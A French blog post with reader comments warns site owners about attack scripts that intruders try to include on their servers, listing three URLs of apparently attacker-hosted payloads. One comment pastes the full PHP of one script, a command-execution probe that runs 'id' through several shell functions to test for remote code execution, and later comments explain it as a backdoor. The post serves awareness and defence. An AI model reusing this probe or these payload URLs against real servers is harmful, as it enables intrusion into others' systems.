E-commerce et sécurité (partie 2)

E-commerce et sécurité (partie 2)

Suite à une discussion sur le sujet avec Edwood, il nous est apparu important pour la démonstration et afin de vous rendre compte de l’importance de sécuriser ses scripts de vous donner quelques exemples d’URL de scripts « pirates » que l’on essaye de faire tourner chez vous. Que vous ayez une boutique, un simple blog ou autre… Si vous savez lire le code informatique, tant mieux pour vous sinon demandez à votre expert informatique et demandez lui ce que font les scripts suivants… Vous serez certainement très surpris.

https://210.176.70.186/cse.jpg
https://canalpt.net/catalog/images/12.txt
https://vps.istri.info/manual/secure.txt

Attention ,les URLs suivants ne sont pas permanents. Ils proviennent à notre avis de sites intermédiaires utilisés par les pirates.
A l’heure où vous lisez ces articles. Certains URL ne seront probablement plus accessibles.

4 réflexions sur « E-commerce et sécurité (partie 2) »

  1. Bonjour
    pour info, moi qui suit barbu, mais pas féru de code, que veut dire le 3ème script : http://vps.istri.info/manual/secure.txt
    copié/collé ci-dessous

    <?php
    echo « Mic22″;
    $cmd= »id »;
    $eseguicmd=ex($cmd);
    echo $eseguicmd;

    function ex($cfe){
    $res =  »;
    if (!empty($cfe)){
    if(function_exists(‘exec’)){
    @exec($cfe,$res);
    $res = join(« n »,$res);
    }
    elseif(function_exists(‘shell_exec’)){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists(‘system’)){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists(‘passthru’)){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe, »r »))){
    $res = «  »;
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    exit;

    Merci pour l’éclairage

  2. cela est un script qui semble til permet de tester s’il est possible d’éxécuter des commandes directes sur le serveur.
    s’il y a un résultat qui apparait, cela signifie que la faille est présente et le serveur exploitable.

  3. Salut
    J’vais dire ok, pour montrer que j’ai compris, alors que non pas trop, mais est-ce type d’url qui déclenche un doute ou est-ce une action qui découle de ce script pirate qui n’est pas traditionnelle ?
    Concrètement qu’elle est la manifestation de ce type d’attaque, si il y en a une.
    A plus

  4. Concrètement, c’est comme si un voleur avait crée une entrée secrète pour rentrer chez toi et lui donner la possibilité de faire ce qu’il veut quand il veut. Il peut à l’aise tout casser, tout copier, tout effacer, tout copier chez toi.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *